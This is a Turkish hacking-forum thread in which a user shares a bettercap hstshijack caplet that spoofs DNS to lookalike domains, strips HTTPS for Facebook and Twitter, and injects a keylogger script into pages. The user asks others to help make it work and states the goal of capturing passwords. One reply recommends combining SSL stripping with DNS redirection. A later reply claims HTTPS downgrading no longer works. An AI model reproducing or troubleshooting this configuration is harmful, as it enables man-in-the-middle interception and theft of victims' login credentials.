Çözüldü Https Kırılmıyor

ѕeleɴια

ѕeleɴια

Kıdemli Üye
18 May 2018
2,619
4
905
ZYZZ
Selamlar. Ben bettercap kullanıyorum. Onda bir https kırmak için bir cap dosyası var.


Kod: 
# ********ation can be found at https://github.com/bettercap/blob/master/hstshijack/README.md

set hstshijack.log             /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore          *
set hstshijack.targets         facebook.com, *.facebook.com, *.twitter.com
set hstshijack.replacements    facebook.corn, *.facebook.corn,*.twitter.corn
#set hstshijack.blockscripts    facebook.com,*.facebook.com
set hstshijack.obfuscate       false
set hstshijack.encode          false
set hstshijack.payloads        *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script  /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains  facebook.corn, *.facebook.corn,*.twitter.corn

http.proxy  on
dns.spoof   on


Benim cap dosyamın kodları bu. Ama ne yaparsam yapayım başka siteler de deniyorum linkedin gibi HTTPS i kırmıyor.

EDİT: JS KODU KULLANMADAN ATMIŞIM AMA NORMALDE İNTERNET DEN BİR JAVA SCRİPT KOD ALDIM ÖYLE DE DENEDİM OLMADI. SİZİNKİ ÇALIŞIYORSA ATABİLİRMİSİNİZ CAP DOSYASINI.

NOT: MITM FRAMEWORK aracı da maalesef ki hata veriyor. Gerekli modulu kurmama rağmen hata alıyorum çözümü bilen varsa buna da cevap verilebilir. Teşekkürler.

Ya şimdi yapmak istediğim olay DNS Zehirlemesi ile de yapılır yani kişiyi farklı bir kendi sunucuma yöneltip de şifreleri alırım. Bu DNS Spoofing i denedim başarılı çalıştı ama birde Bettercap üzerinden https kırma ile şifreleri almak istiyorum o da pratikde olsun.
 
Moderatör tarafında düzenlendi:
Tarihe göre sırala Oylara göre sırala
'Ranger

'Ranger

Anka Red Team Direktörü
13 Eki 2020
330
495
Ssl trip ve dediğiniz gibi dns yonlendirmesini 2 sini bir aradayaparak ssl sertifikasini devre dışı bırakabilirsiniz.

Bu şekilde tewetter de olmuyor internet te %99 sitelerde ise yarıyor

Ssl trip diye aratirsaniZ birçok farklı ssl sertifikası atlatmaya yarayan metodla karşılaşacaksınız

Iyi formlar.
basarilar
 
Oyla 0 Downvote
ѕeleɴια

ѕeleɴια

Kıdemli Üye
18 May 2018
2,619
4
905
ZYZZ
heredotcan' Alıntı:
Arkadaşlar HTTPS kırmak diye birşey yoktur bunla zaman kaybetmeyin HSTS mantığını Http çalışma mantığını bilmeden HTTPS down grade etmeye çalışmanız boşuna zaman kaybıdır günümüz şartlarında HTTPS down grade etmek mümkün değildir
Genişletmek için tıkla ...
Ty abi, ben zaten bıraktım yazılım hack vb. :/ YBS okumayı planlıyorum bakalım, hayırlısı.
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.